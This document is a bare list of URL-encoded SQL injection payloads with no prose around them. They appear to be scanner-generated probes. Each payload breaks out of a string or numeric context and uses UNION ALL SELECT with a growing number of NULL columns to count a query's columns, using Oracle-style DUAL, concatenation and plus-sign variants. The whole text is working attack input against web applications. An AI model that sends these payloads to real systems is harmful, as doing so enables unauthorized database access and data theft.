1%27%20%7C%7C%20%28SELECT%205309%20FROM%20DUAL%20WHERE%208454%3D8454%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%206082%20FROM%20DUAL%20WHERE%201393%3D1393%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%204874%20WHERE%203860%3D3860%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%207656%20WHERE%208894%3D8894%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%204712%20WHERE%201651%3D1651%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%204632%20WHERE%207838%3D7838%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%205695%20WHERE%205379%3D5379%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%204563%20WHERE%206509%3D6509%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%208662%20WHERE%209967%3D9967%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%208703%20WHERE%209116%3D9116%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%203038%20WHERE%205992%3D5992%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%204815%20WHERE%202349%3D2349%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%205581%20FROM%20DUAL%20WHERE%204467%3D4467%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%205472%20FROM%20DUAL%20WHERE%208516%3D8516%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%208897%20FROM%20DUAL%20WHERE%207899%3D7899%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%208358%20FROM%20DUAL%20WHERE%204775%3D4775%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%204777%20FROM%20DUAL%20WHERE%203657%3D3657%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%206068%20FROM%20DUAL%20WHERE%207798%3D7798%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%205617%20FROM%20DUAL%20WHERE%206299%3D6299%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%204279%20FROM%20DUAL%20WHERE%206829%3D6829%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%205864%20FROM%20DUAL%20WHERE%208526%3D8526%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%204009%20FROM%20DUAL%20WHERE%201617%3D1617%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%206707%20WHERE%209907%3D9907%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%204366%20WHERE%206599%3D6599%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%205885%20WHERE%208874%3D8874%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%204659%20WHERE%209381%3D9381%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%208070%20WHERE%204486%3D4486%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%202612%20WHERE%203167%3D3167%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%203300%20WHERE%207027%3D7027%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%209181%20WHERE%204188%3D4188%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%201102%20WHERE%209032%3D9032%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%204636%20WHERE%201829%3D1829%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%27%20%2B%20%28SELECT%20%27HnlX%27%20FROM%20DUAL%20WHERE%203581%3D3581%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27Mwvc%27%20FROM%20DUAL%20WHERE%201225%3D1225%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27PgGl%27%20FROM%20DUAL%20WHERE%209646%3D9646%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27yChW%27%20FROM%20DUAL%20WHERE%201723%3D1723%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27OPkf%27%20FROM%20DUAL%20WHERE%206405%3D6405%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27GOjt%27%20FROM%20DUAL%20WHERE%207104%3D7104%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27byvg%27%20FROM%20DUAL%20WHERE%206559%3D6559%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27pdMN%27%20FROM%20DUAL%20WHERE%203679%3D3679%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27RSyt%27%20FROM%20DUAL%20WHERE%206833%3D6833%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27JeVX%27%20FROM%20DUAL%20WHERE%201092%3D1092%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 